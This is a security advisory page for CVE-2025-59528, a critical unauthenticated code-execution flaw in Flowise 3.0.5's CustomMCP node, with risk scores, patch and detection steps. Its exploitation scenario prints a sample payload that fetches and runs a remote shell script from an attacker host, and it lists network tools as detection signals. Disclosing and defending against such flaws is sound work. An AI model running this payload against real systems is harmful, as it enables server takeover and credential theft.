CVE-2025-59528 — CRITICAL (CVSS 10.0)

CISO Take

Flowise 3.0.5 contains a maximum-severity (CVSS 10.0) unauthenticated remote code execution flaw: the CustomMCP node passes user-supplied configuration strings directly into JavaScript's `Function()` constructor with zero sanitization, granting attackers full Node.js runtime access including `child_process` and `fs` modules. With no privileges required, no user interaction needed, and a public proof-of-concept already available, any internet-exposed Flowise instance should be treated as actively compromised until patched. Flowise has 16 prior CVEs in the same package, and this class of vulnerability — server-side JavaScript injection in LLM orchestration tooling — is a particularly high-value target because these platforms typically run with broad filesystem and network access in AI production environments. Upgrade immediately to Flowise 3.0.6; if patching is blocked, restrict access to the CustomMCP node configuration endpoint via network controls and audit process execution logs for anomalous child_process spawning.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Maximum exploitability: CVSS 10.0 with network vector, low complexity, no privileges, no user interaction, and changed scope. The Function() constructor pattern is a well-understood exploit primitive — no specialized knowledge required to weaponize. Public PoC lowers the bar to script-kiddie level. Not yet in CISA KEV but given the trivial exploitation and critical severity, KEV addition is plausible. AI orchestration platforms like Flowise typically run in privileged positions within the data pipeline — with access to LLM API keys, database credentials, and internal services — dramatically amplifying post-exploitation blast radius beyond the vulnerable host itself.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
flowise	npm	—	No patch
flowise	npm	—	No patch

Severity & Risk

CVSS 3.1

10.0 / 10

EPSS

83.9%

chance of exploitation in 30 days

Higher than 99% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

○ EPSS exploit prediction: 84%

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Changed

C High

I High

A High

What should I do?

4 steps

Immediate

Upgrade Flowise to version 3.0.6 which patches the Function() constructor injection.
If unable to patch

Block external access to the Flowise API endpoint (default port 3000) at the network/WAF layer; restrict CustomMCP node usage via Flowise's built-in authorization controls if configured.
Detection

Monitor for anomalous child process spawning from the Flowise Node.js process (e.g., sh, bash, curl, wget, nc as child processes). Review Node.js application logs for unusual Function() constructor invocations. Search SIEM for outbound connections from the Flowise host to non-standard endpoints.
Post-patch

Rotate all credentials (LLM API keys, DB passwords, cloud tokens) accessible from the Flowise server environment — assume compromise if the server was internet-exposed on 3.0.5.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Agent Framework Plugin AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell AML.T0083 - Credentials from AI Agent Configuration

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.6.2.5 - AI System Security

NIST AI RMF

MANAGE 2.2 - Mechanisms for AI Risk Response

OWASP LLM Top 10

LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-59528?

Flowise 3.0.5 contains a maximum-severity (CVSS 10.0) unauthenticated remote code execution flaw: the CustomMCP node passes user-supplied configuration strings directly into JavaScript's `Function()` constructor with zero sanitization, granting attackers full Node.js runtime access including `child_process` and `fs` modules. With no privileges required, no user interaction needed, and a public proof-of-concept already available, any internet-exposed Flowise instance should be treated as actively compromised until patched. Flowise has 16 prior CVEs in the same package, and this class of vulnerability — server-side JavaScript injection in LLM orchestration tooling — is a particularly high-value target because these platforms typically run with broad filesystem and network access in AI production environments. Upgrade immediately to Flowise 3.0.6; if patching is blocked, restrict access to the CustomMCP node configuration endpoint via network controls and audit process execution logs for anomalous child_process spawning.

Is CVE-2025-59528 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-59528, increasing the risk of exploitation.

How to fix CVE-2025-59528?

1. **Immediate**: Upgrade Flowise to version 3.0.6 which patches the Function() constructor injection. 2. **If unable to patch**: Block external access to the Flowise API endpoint (default port 3000) at the network/WAF layer; restrict CustomMCP node usage via Flowise's built-in authorization controls if configured. 3. **Detection**: Monitor for anomalous child process spawning from the Flowise Node.js process (e.g., `sh`, `bash`, `curl`, `wget`, `nc` as child processes). Review Node.js application logs for unusual `Function()` constructor invocations. Search SIEM for outbound connections from the Flowise host to non-standard endpoints. 4. **Post-patch**: Rotate all credentials (LLM API keys, DB passwords, cloud tokens) accessible from the Flowise server environment — assume compromise if the server was internet-exposed on 3.0.5.

What systems are affected by CVE-2025-59528?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM orchestration pipelines, MCP-connected AI tool chains, multi-model AI workflows.

What is the CVSS score for CVE-2025-59528?

CVE-2025-59528 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 83.86%.

Technical Details

NVD Description

Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.

Exploitation Scenario

An attacker identifies an internet-exposed Flowise instance via Shodan/Censys (Flowise has a recognizable web UI fingerprint). They send a crafted POST request to the node configuration API endpoint (no authentication required in default deployments), embedding a JavaScript payload in the `mcpServerConfig` field — e.g., `require('child_process').exec('curl attacker.com/shell.sh | bash')`. The `convertToValidJSONString` function passes this directly to `new Function(userInput)()`, executing it with the Node.js process's full privileges. The attacker establishes a reverse shell, then systematically harvests all environment variables (LLM API keys, database URLs), reads the Flowise flows database to enumerate connected AI services, and uses the compromised server as a pivot point into the organization's internal AI infrastructure.